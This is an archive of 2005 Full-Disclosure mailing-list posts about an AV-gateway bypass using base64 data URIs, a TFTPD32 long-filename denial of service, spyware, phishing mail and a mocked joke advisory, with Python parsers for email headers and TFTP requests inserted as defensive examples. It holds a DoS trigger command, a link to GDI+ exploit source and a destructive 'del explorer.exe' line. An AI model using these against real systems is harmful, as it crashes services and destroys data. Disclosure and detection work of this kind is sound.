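    Each MTA prepends its own Received: line, so the top header is the most
    recent hop and the bottom one is closest to the origin. Entries without a
    'from ... by ...' peer (the local qmail 'invoked by uid 0' lines) are skipped.
    """
    msg = email.message_from_string(raw)
    hops = []
    for header in reversed(msg.get_all("Received") or []):
        m = HOP_RE.search(header)
        if m:
            hops.append(m.groupdict())
    return hops


def origin(raw):
    """(host, ip) of the first relay that handed the mail in, or None."""
    hops = received_hops(raw)
    return (hops[0]["src"], hops[0]["ip"]) if hops else None


def flags(raw):
    """Cheap indicators that this is not a vendor shipping notice."""
    msg = email.message_from_string(raw)
    found = []
    o = origin(raw)
    if o and any(h in o[0].lower() for h in DYNAMIC_HINTS):
        found.append("origin %s (%s) looks like a dynamic customer address" % o)
    sender = ADDR_RE.search(msg.get("From", "") or "")
    rcpt = ADDR_RE.search(msg.get("To", "") or "")
    if sender and rcpt and sender.group(1) == rcpt.group(1):
        found.append("self-addressed: From and To carry the same address")
    for link in BARE_LINK_RE.findall(msg.get_payload()):
        found.append("bare link without scheme: %s" % link)
    return found


if __name__ == "__main__":
    for hop in received_hops(SAMPLE):
        print("%(src)s (%(ip)s) -> %(dst)s" % hop)
    print("origin:", origin(SAMPLE))
    for f in flags(SAMPLE):
        print("flag:", f)
```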



Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Steven Rakick
At this point I have no choice but to agree.

So far I've had an opportunity to test this with Check
Point Interspect and McAfee IntruShield. Like you
said, (in my lab) both detected and blocked the
malicious image when it was formatted without RFC
2397, but when base64 encoded it was downloaded and
executed its attack.

Basically it's looking like no security companies are
looking at data formatted in this fashion. I'm not
sure but it seems like you can probably transfer
anything you'd like by just changing the content type
and your anti-virus, IDS, application firewall or
whatever you're using at the network level would be
completely oblivious.






On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> Hello Danny,
> 
> This vulnerability is only applicable to the HTTP data while in
> transit. Once received by the client the image will be rendered and
> subsequently detected by local AV software.
> 
> At the present time, I'm not aware of any AV, IDS or IPS vendor that
> will detect malicious images embedded in HTML in this manner.
> 
> 
> Thank you,
> 
> Darren Bounds
> Intrusense, LLC.
> 
> --
> Intrusense - Securing Business As Usual
> 
> On Jan 11, 2005, at 2:14 PM, Danny wrote:
> 
> > On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
> > <[EMAIL PROTECTED]> wrote:
> >> -----BEGIN PGP SIGNED MESSAGE-----
> >> Hash: SHA1
> >>
> >> Multi-vendor AV gateway image inspection bypass vulnerability
> >> January 10, 2005
> >>
> >> A vulnerability has been discovered which allows a remote attacker to
> >> bypass anti-virus (as well as other security technologies such as IDS
> >> and IPS) inspection of HTTP image content.
> >>
> >> By leveraging techniques described in RFC 2397 for base64 encoding
> >> image content within the URL scheme, a remote attacker may encode a
> >> malicious image within the body of an HTML formatted document to
> >> circumvent content inspection.
> >>
> >> For example:
> >>
> >> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> >>
> >> The source code at the URL above will by default create a JPEG image
> >> that will attempt (and fail without tweaking) to exploit the Microsoft
> >> MS04-028 GDI+ vulnerability. The image itself is detected by all AV
> >> gateway engines tested (Trend, Sophos and McAfee); however, when the
> >> same image is base64 encoded using the technique described in RFC 2397
> >> (documented below), inspection is not performed and it is delivered and
> >> rendered by the client.
> >>
> >> While Microsoft Internet Explorer does not support the RFC 2397 URL
> >> scheme, Firefox, Safari, Mozilla and Opera do and will render the data
> >> and thus successfully execute the payload if the necessary OS and/or
> >> application patches have not been applied.

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread Dan Margolis
On Tue, Jan 11, 2005 at 10:03:30PM +0100, devis wrote:
> It is a proven matter that spyware does exploit IE holes (iframe bugs,
> ActiveX, etc.). Do your work on a few and you will see.

Perhaps some do, but generally speaking this is unnecessary for spyware
to exist, as I said before; spyware exists regardless of such
vulnerabilities. 

> Besides, you missed the point entirely: if a user, just by clicking, can install
> spyware on his machine, then the OS / browser is to blame, not the
> actual (bad) code (exploiting it) floating around websites.

A user can install spyware with one click for the same reason he can
install a *good* application with one click. Having the user run every
day with install privileges is relatively irrelevant; if he owns the
machine, he will have the ability to install things. Being prompted for
an admin password (as in the case of OSX) hardly prevents a stupid user
from installing crap. 


> Once again, you are missing the point completely, if M$ didn't 'slack 
> code' their OS, spyware would :
> 1) not install

How do you intend to make spyware not install while still allowing the
user to install other things?

> 2) therefore not exist in the form, numbers and variety we know them

See above. 

> I'll give you a clue:
> try to get a 'tool bar' or some 'other added bonus' automagically on 
> bsd/unix/linux/solaris using any browser, on any site, clicking randomly.

I cannot do so from "clicking randomly," but I quite easily can simply
from clicking "OK" to the download prompt. Firefox installs plugins and
toolbars just as easily as IE does. 

> As you said,
> 'It's very, very difficult to prevent people from voluntarily installing 
> spyware on their own systems.' yes indeed, because MS made it that the 
> average joe is an admin therefore has supreme powers out of the box.

So we don't give the *owner* admin privileges? Mac does this, as does
Linux. I don't know of a single OS where the machine's owner does not,
by default, have admin access. 

> Usability costs security. Always has, always will.

Of course. But the ability to execute code is pretty much
non-negotiable. I will never buy a general purpose PC on which I cannot
run programs of my choosing. And if MS sold one as such, you would be
here complaining about that instead. 

The point is, spyware does not require OS vulnerabilities to be spyware,
and it likely, for a long time to come, never will. I never argued that
Windows is the most secure OS, however, only that spyware does not imply
bugs. And that point should, by now, be crystal clear. 
-- 
Dan


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Andrew Farmer
On 11 Jan 2005, at 14:52, Team Pwnge wrote:
                                  ^
Nice start: you can't even spell your own name correctly.

> Description
> ===
> Shogun Suzuki discovered that a remote user can connect to any
> machine via numerous exploits and use Windows Explorer to view files,
> rename files, delete files, change permissions on files stored on a
> remote machine that has been pwned.

Pray tell. An important element of disclosure is to actually disclose
something. This, however, depends on there actually being something
worth disclosing.

> Impact
> ==
> A remote attacker could install something similar to PCAnywhere
> after exploiting Windows and use Windows' Explorer to view, copy
> and or open any file on a victims machine.

... or, "after exploiting Windows", an attacker could just "view,
copy, and or open any file on a victims[sic] machine" without
Explorer's help.

> Concerns?
> =
> Security is a primary focus of TEAM PWN4GE ...

Er... right.

> ... and ensuring the
> progress of secure Windows machines be our dreams.

And grammar be you lacking.
Oh, wait. You probably haven't gotten to that in school yet. Never
mind.

> ... As security
> concerns should be addressed to respective vendors, ...

Reasonable enough, I suppose...

> ... we feel the urge to bypass standards ...

Um... yeah. "We think that $X is good, so we aren't going to do it."

> ... and bring our common dreams of a secure homeland to the Interweb.

*SPLUTTER*




[Fwd: Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable]

2005-01-11 Thread devis
Dan Margolis wrote:
> On Tue, Jan 11, 2005 at 10:03:30PM +0100, devis wrote:
>> It is a proven matter that spyware does exploit IE holes (iframe bugs,
>> ActiveX, etc.). Do your work on a few and you will see.
>
> Perhaps some do, but generally speaking this is unnecessary for spyware
> to exist, as I said before; spyware exists regardless of such
> vulnerabilities.
>
>> Besides, you missed the point entirely: if a user, just by clicking, can install
>> spyware on his machine, then the OS / browser is to blame, not the
>> actual (bad) code (exploiting it) floating around websites.
>
> A user can install spyware with one click for the same reason he can
> install a *good* application with one click.

That is where we do not agree. I do not believe a user should be able
to install anything. I have set up a few unfortunates of my clients that
get bugged randomly with a 'user' limited user account and an admin
account. Given you explain to them why, they understood perfectly and
asked me why M$ didn't install in such a way. I answered that they
prefer to expect their user base to be more stupid than able to comprehend.

> Having the user run every
> day with install privileges is relatively irrelevant; if he owns the
> machine, he will have the ability to install things. Being prompted for
> an admin password (as in the case of OSX) hardly prevents a stupid user
> from installing crap.
>
>> Once again, you are missing the point completely, if M$ didn't 'slack
>> code' their OS, spyware would :
>> 1) not install
>
> How do you intend to make spyware not install while still allowing the
> user to install other things?

See up there.

>> 2) therefore not exist in the form, numbers and variety we know them
>
> See above.
>
>> I'll give you a clue:
>> try to get a 'tool bar' or some 'other added bonus' automagically on
>> bsd/unix/linux/solaris using any browser, on any site, clicking randomly.
>
> I cannot do so from "clicking randomly," but I quite easily can simply
> from clicking "OK" to the download prompt. Firefox installs plugins and
> toolbars just as easily as IE does.

You speak without trying. Please go install 'Gator' or 'Alexa What's
related' on such a box. I see your point about using the Firefox extensions
/ software install panel, but so far in the wild on unix machines ... no
reports. If it ever gets used on Firefox for Windows, for example, to
install spyware, it is because there is a Windows box behind it. Please
find me ONE example of spyware in the wild that installs on a unix
browser. Write a POC if it doesn't exist and please show that unix
spyware in the home directory of the user is efficient.

>> As you said,
>> 'It's very, very difficult to prevent people from voluntarily installing
>> spyware on their own systems.' yes indeed, because MS made it that the
>> average joe is an admin therefore has supreme powers out of the box.
>
> So we don't give the *owner* admin privileges? Mac does this, as does
> Linux. I don't know of a single OS where the machine's owner does not,
> by default, have admin access.

No we don't. Believe me, it's a 5 minute talk making a user aware of
another account on his computer reserved for administrative tasks (new
installs, updates, etc).

>> Usability costs security. Always has, always will.
>
> Of course. But the ability to execute code is pretty much
> non-negotiable. I will never buy a general purpose PC on which I cannot
> run programs of my choosing. And if MS sold one as such, you would be
> here complaining about that instead.
>
> The point is, spyware does not require OS vulnerabilities to be spyware,

but it does to install and therefore do its task.

> and it likely, for a long time to come, never will. I never argued that
> Windows is the most secure OS, however, only that spyware does not imply
> bugs. And that point should, by now, be crystal clear.

Spyware does imply bugs and weakness. Once again, until you prove
that spyware out there in the wild installs or will install (in the near
future) in other browsers, on unix, running a non-privileged account, I
cannot agree with you. When you write a spyware you are not only gonna
choose the most popular platform, but the easiest platform to do so.
Spyware on Windows exists not only because it's the most popular OS, but
mainly because it is trivial to adapt an installation of malware over a
vulnerability (remember how Blaster spread?).

Basically, I am answering because you have given up on educating the
average user, and this is plain wrong. Setting up right security
practices out of the box, then explaining to the average joe how to use his
computer, would not seem such a tedious task now if M$ had done it
properly from the start. Educating the end user is still possible. We
managed to tell them not to click random emails for the last few years,
and some still do, but overall it's a big improvement.

Not trusting the user to improve is a big mistake. Not explaining why is
equally a big mistake. The products got to change,

RE: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Paul Kurczaba
Why not also delete KDE, Gnome and all the other desktops out there.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Team Pwnge
Sent: Tuesday, January 11, 2005 5:52 PM
To: [EMAIL PROTECTED]; bugtraq@securityfocus.com;
full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TEAM PWN4GE Security Advisory PWNED
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: HIGH
 Title: EXPLORER: Vulnerability in all versions of Windows Explorer
  Date: January 11, 2005

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple overflows have been found in Windows Explorer, potentially allowing
a remote user to open Explorer and run files remotely.


Background
==

Windows Explorer is an advanced browsing tool made by Microsoft. It is used
in daily tasks to open folders, copy files, delete files, rename files and
view files on a system. It is the foundation of the World Wide Web and used
by billions worldwide. It runs on an array of machines.


Affected versions
=

All versions of Windows' Explorer are vulnerable

Description
===

Shogun Suzuki discovered that a remote user can connect to any machine via
numerous exploits and use Windows Explorer to view files, rename files,
delete files, change permissions on files stored on a remote machine that
has been pwned.

Impact
==

A remote attacker could install something similar to PCAnywhere after
exploiting Windows and use Windows' Explorer to view, copy and or open any
file on a victims machine.

Workaround
==

On a command prompt: del C:\WINDOWS\explorer.exe


Concerns?
=

Security is a primary focus of TEAM PWN4GE and ensuring the progress of
secure Windows machines be our dreams. As security concerns should be
addressed to respective vendors, we feel the urge to bypass standards and
bring our common dreams of a secure homeland to the Interweb.

License
===

Copyright 2005 TEAM PWN4GE

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


Re: [Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail

2005-01-11 Thread jigmed pema
Hi, I am new to the list, therefore greetings and kudos to all first.
I've been monitoring this kind of strange mail myself; they all land in my
catchall inbox. What baffles me about them is the fact that they are
addressed to a mail account on one of my subdomains I never used so
far (the site is not even up yet), and which does not exist on that
domain, and that they started to hit me some hours after I had this domain
registered. They all come either from a bogus yahoo or otherwise
suspicious (spoofed??) account, all to something like jwsch mysubdomain
dot com. The same subdomain name is registered by me with the
.org, .info, .net and .de extensions; those have not been addressed so
far, and I wonder?
Personally I think it's random spam to check if this domain or a
mail account on this domain is reachable, but I don't have proof for
that yet.
I shall keep an eye on this suspicious stuff from here on.

Thank you for letting me be part of this list. Regards,
Jigmed Pema
RandallM wrote:
Have been getting a number of these come thru also at work. 
Of course all the users are asking me questions about these.
They all have the strange words, paragraphs, and questions like this one.
They really got my attention. I at first thought they were hidden messages
but
Not so as the one we receive come as text. 

thank you
Randall M

<|>--
<|>
<|>Message: 4
<|>Date: Tue, 11 Jan 2005 02:27:55 +
<|>From: "DAN MORRILL" <[EMAIL PROTECTED]>
<|>Subject: [Full-Disclosure] Interesting but suspicious possible
<|>	phishing mail
<|>To: full-disclosure@lists.netsys.com
<|>Message-ID: <[EMAIL PROTECTED]>
<|>Content-Type: text/plain; format=flowed
<|>
<|>Hi folks,
<|>
<|>Got this really interesting mail in my box today, and 
<|>knowing that I haven't 
<|>used that e-mail address or ordered anything on line lately. 
<|>Wondering if it 
<|>might not be a phishing e-mail. Haven't seen anything like 
<|>this before. 
<|>Anyone see anything similar?
<|>r/
<|>Dan
<|>
<|>
<|>
<|>from :  Gabrielle U. Philips, Jr <[EMAIL PROTECTED]>
<|>Sent :  Monday, January 10, 2005 10:40 PM
<|>To :  "Gabrielle U. Philips, Jr" <[EMAIL PROTECTED]>
<|>CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
<|>[EMAIL PROTECTED], [EMAIL PROTECTED]
<|>Subject :  Shipping Notification, Tracking Number 

- - - - - - - -  snip  - - - - - - - - -  -


RE: [Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbugalone

2005-01-11 Thread ALD, Aditya, Aditya Lalit Deshmukh
> And the money payoff begins..

So it looks like MS anti-spyware would be just one more useless tool from
Microsoft.
As a win32 kernel programmer I find all the spyware removal business too time
consuming - if any one of them affects my machine they get weeded out with a
kernel debugger.
But there should be a way to automate the process.

Looks like we do have to stick with our trusty debuggers, Spybot and
Ad-Aware!





[Full-Disclosure] TFTPD32 Long FileName Remote Denial of Service

2005-01-11 Thread Sowhat .
TFTPD32 Long FileName Remote Denial of Service

By Sowhat
12.JAN.2005
http://secway.org/advisory/ad20050108.txt

Product Affected:

TFTPD 2.74 and prior

Impact:
Low


(1) Introduction

TFTPD32 is a bundle including a full featured TFTP server, a TFTP
client, a DHCP server and a Syslog server.
TFTPD32 is designed for Windows 95/NT/2000/XP.
"TFTPD32 recommended by Cisco, HP  and other companies" --From the
author's webpage.

For more information:
http://perso.wanadoo.fr/philippe.jounin/TFTPD32.html

(2) Details
A vulnerability in TFTPD32 may allow remote attackers to crash
TFTPD32 and therefore cause a Denial of Service.

aviram(@)beyondsecurity.com had reported "TFTPD32 Buffer Overflow
Vulnerability (Long filename)" to bugtraq, and it seems that the
author fixed the problem in v2.51.
But during a simple audit, I found that TFTPD32 is still vulnerable to
"Long Filename".

C:\Windows\System32>tftp -i 192.168.0.1 get A...[about 508 'A' here]...AA

TFTPD32 will print the following error message 2 times:
"Error:RecvFrom Returns 10040 <"A message sent on a datagram socket
was larger than the internal message buffer or some other network
limit, or the buffer used to receive a datagram into was smaller than
the datagram itself.">"
and then it will die.

But this vulnerability seems very unstable and not exploitable.
TFTPD32 will not die immediately, usually 10-15 seconds after the
request, and sometimes you need to "get" 2-3 times.

(3) Solution

Waiting for the author's update

(4) Author Response

I have sent an email to the author BUT no reply yet.
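The crash above is triggered by a read request whose filename pushes the datagram past what the server expects; as an added example for the defender side (not the advisory author's code), the Python below parses TFTP RRQ/WRQ datagrams per RFC 1350 and flags oversized filenames, oversized datagrams and unterminated requests, so a sensor or front-end filter can alert before such traffic reaches a server like TFTPD32. The sample datagrams are constructed and the thresholds are assumptions: 516 bytes is the largest packet RFC 1350 defines (512 data bytes plus a 4-byte header), 255 bytes a generous filename bound.

```python
"""Parse TFTP read/write requests (RFC 1350) and flag ones that match the long-filename DoS.

Added example for the defender side; not the advisory author's code. The datagrams
below are constructed. Thresholds are assumptions: 516 bytes is the largest packet
RFC 1350 defines (512 data bytes plus a 4-byte header), 255 is a generous filename bound.
"""
import struct

RRQ, WRQ = 1, 2
OPCODE_NAMES = {RRQ: "RRQ", WRQ: "WRQ"}
MAX_PACKET = 516
MAX_FILENAME = 255
VALID_MODES = (b"netascii", b"octet", b"mail")


def parse_request(pkt):
    """Return a dict for an RRQ/WRQ datagram, or None if the opcode is something else.

    Wire format: 2-byte opcode | filename | 0 | mode | 0  (options may follow, RFC 2347).
    Raises ValueError when the request is not properly NUL-terminated.
    """
    if len(pkt) < 2:
        raise ValueError("datagram shorter than an opcode")
    (opcode,) = struct.unpack("!H", pkt[:2])
    if opcode not in OPCODE_NAMES:
        return None
    fields = pkt[2:].split(b"\x00")
    # A well-formed request splits into filename, mode and a trailing empty field.
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("request fields are not NUL-terminated")
    return {
        "op": OPCODE_NAMES[opcode],
        "filename": fields[0],
        "mode": fields[1].lower(),
        "options": fields[2:-1],
        "length": len(pkt),
    }


def assess_request(pkt):
    """List of findings for one datagram; empty means it looks like an ordinary request."""
    findings = []
    try:
        req = parse_request(pkt)
    except ValueError as exc:
        return ["malformed: %s" % exc]
    if req is None:
        return findings
    if len(req["filename"]) > MAX_FILENAME:
        findings.append("%s filename of %d bytes exceeds %d"
                        % (req["op"], len(req["filename"]), MAX_FILENAME))
    if req["length"] > MAX_PACKET:
        findings.append("datagram of %d bytes exceeds %d" % (req["length"], MAX_PACKET))
    if req["mode"] not in VALID_MODES:
        findings.append("unknown transfer mode %r" % req["mode"])
    return findings


def build_request(opcode, filename, mode=b"octet"):
    """Assemble a request datagram; used here only to construct the samples below."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


# Constructed samples: a normal boot-image fetch and a 508-byte filename like the one
# described above, which makes the whole datagram 517 bytes.
SAMPLES = {
    "normal": build_request(RRQ, b"pxelinux.0"),
    "long_name": build_request(RRQ, b"A" * 508),
    "truncated": b"\x00\x01" + b"firmware.bin",          # no NUL terminators at all
    "data_block": b"\x00\x03\x00\x01" + b"x" * 512,      # DATA packet: not a request
}


def scan(samples):
    """Map sample name -> findings, keeping only the samples that produced any."""
    results = {name: assess_request(pkt) for name, pkt in samples.items()}
    return {name: f for name, f in results.items() if f}


if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name, "->", "; ".join(findings))
```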


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Kevin Reiter


: Windows Explorer is an advanced browsing tool made by Microsoft. It is used
: in daily tasks to open folders, copy files, delete files, rename files and
: view files on a system. It is the foundation of the World Wide Web and used

OK, we need to figure out which "Explorer" this guy is talkin' about - Internet
Explorer or Windows Explorer.

: Shogun Suzuki discovered that a remote user can connect to any machine via
: numerous exploits and use Windows Explorer to view files, rename files,
: delete files, change permissions on files stored on a remote machine that
: has been pwned.

..such as ...  (HINT:  What 'sploits?)

: On a command prompt: del C:\WINDOWS\explorer.exe

Erm...sure...OK.   But what happens when the poor sucker reboots the box and
discovers the O/S is inop (provided the O/S even lets you delete the file in the
first place, since explorer.exe is the shell ...)?

Sorry, but this was the very first post I saw after I joined this list a little
bit ago, and I couldn't resist a few comments.  Is this guy for real, or is 
this a
joke?

-K



Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Martin Allert


Are there any age-based or I-am-dumb-as-bread limitations to this mailing list 
so we will be spared from such nonsense in the future?

Like this idiotic "rm" exploit. The next thing is an exploit message for spying
out other servers by using sophisticated espionage tools based on HTTP,
developed by the CIA and maintained by the Illuminati.

One simply calls it a webbrowser, others call it crowbar of the net.
Or why would THEY name a webbrowser "spyglass"? :)

> Sent: Tuesday, January 11, 2005 5:52 PM
> To: [EMAIL PROTECTED]; bugtraq@securityfocus.com;
> full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER
> 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> TEAM PWN4GE Security Advisory PWNED
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
>   Severity: HIGH
>  Title: EXPLORER: Vulnerability in all versions of Windows Explorer
>   Date: January 11, 2005
> 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 

*nonsense deleted*

Yours,

Martin

-- 


 arago AG, Institut fuer komplexes Datenmanagement
 Am Niddatal 3, 60488 Frankfurt/Main, [EMAIL PROTECTED]
 Tel. 069/405680, Fax 069/40568111, http://www.arago.de


